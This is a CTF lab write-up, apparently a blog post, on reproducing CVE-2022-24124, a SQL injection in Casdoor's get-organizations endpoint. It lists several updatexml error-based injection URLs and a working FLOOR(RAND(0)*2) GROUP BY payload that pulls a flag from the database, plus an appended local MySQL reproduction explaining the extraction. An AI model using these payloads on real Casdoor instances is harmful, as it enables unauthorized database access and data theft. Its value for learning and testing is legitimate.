【春秋云境】Reproducing CVE-2022-24124


    I never understood how updatexml is actually supposed to be injected here.
    &field=updatexml(0,concat(0x7e,(version()),0x7e),0)
    This really does bring back the version number.
    But if I swap in database() it still doesn't work.
    Later I tried now()
    and that also returns the time.

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select version()),0x7e),1)) and name

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=casdoor),'~'),1)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(version()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(now()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(rand()),0x7e),0)

    http://eci-2ze8m3ckd3bddsjlqq3a.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(0,concat(0x7e,(database()),0x7e),0)

    I tried all of the payloads above, and basically every one of them just errors out with "XPATH queries".
    So can someone tell me why updatexml doesn't work here?
    In the end I still had to rely on someone else's write-up:

    https://blog.csdn.net/giaogiaogioao/article/details/128053328#comments_24414057

    http://eci-2ze625l338u3rfrh3r36.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(',',id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
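The final payload above is the classic MySQL error-based trick that abuses `FLOOR(RAND(0)*2)` inside a `GROUP BY`. The following is an added example, not code from the original post or from Casdoor: it reproduces the same statement in a local MySQL instance so you can see why it errors and where the leaked value ends up. The database, table layout and flag value are constructed for the demo; the only thing known about the target's real schema is what the payload itself names (`casdoor.flag` with columns `id` and `flag`).

```sql
-- Added example (not from the original post or from Casdoor): local MySQL
-- reproduction of the error-based FLOOR(RAND(0)*2) GROUP BY technique.
-- The schema and flag value below are constructed for this demo.
CREATE DATABASE IF NOT EXISTS casdoor;
USE casdoor;
DROP TABLE IF EXISTS flag;
CREATE TABLE flag (id INT PRIMARY KEY, flag VARCHAR(128));
INSERT INTO flag VALUES (1, 'flag{constructed-demo-value}');

-- Why this errors: RAND(0) is seeded, so FLOOR(RAND(0)*2) evaluated row by
-- row always yields the sequence 0,1,1,0,1,1,... GROUP BY aggregates through
-- a temporary table keyed on x, and the key expression is evaluated again
-- when a row is inserted:
--   row 1: looks up key '...0' (miss), inserts with recomputed key '...1'
--   row 2: looks up key '...1' (hit), increments the count
--   row 3: looks up key '...0' (miss), inserts with recomputed key '...1'
--          -> duplicate of the existing '...1' row
-- MySQL aborts with ER_DUP_ENTRY (1062) and prints the colliding key, which
-- is our CONCAT() of the secret plus the trailing 0/1 digit. Any driver table
-- with at least 3 rows works; the payload uses information_schema.tables
-- because it always exists and is readable.
SELECT 1 FROM (
  SELECT COUNT(*),
         CONCAT((SELECT CONCAT(',', id, flag) FROM casdoor.flag LIMIT 0,1),
                FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables
  GROUP BY x
) a;

-- The inner subquery must return exactly one row (hence LIMIT 0,1); to read
-- further rows change the offset (LIMIT 1,1, LIMIT 2,1, ...). The duplicate
-- entry text is truncated for long values, so wrap the concatenation in
-- SUBSTR(..., 1, 32), then SUBSTR(..., 33, 32), and stitch the pieces.
```

Running the `SELECT` fails with error 1062 "Duplicate entry ... for key ..." (the exact key name differs between MySQL 5.x and 8.x), and the quoted entry starts with `,1flag{constructed-demo-value}` followed by the `1` from `FLOOR(RAND(0)*2)`. In a plain MySQL session `updatexml()` leaks a value through the XPATH error in the same way; which variant survives inside a particular application depends on how the injected text is wrapped into the final statement, which this post does not show.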
Original post: https://blog.csdn.net/weixin_45275983/article/details/128137915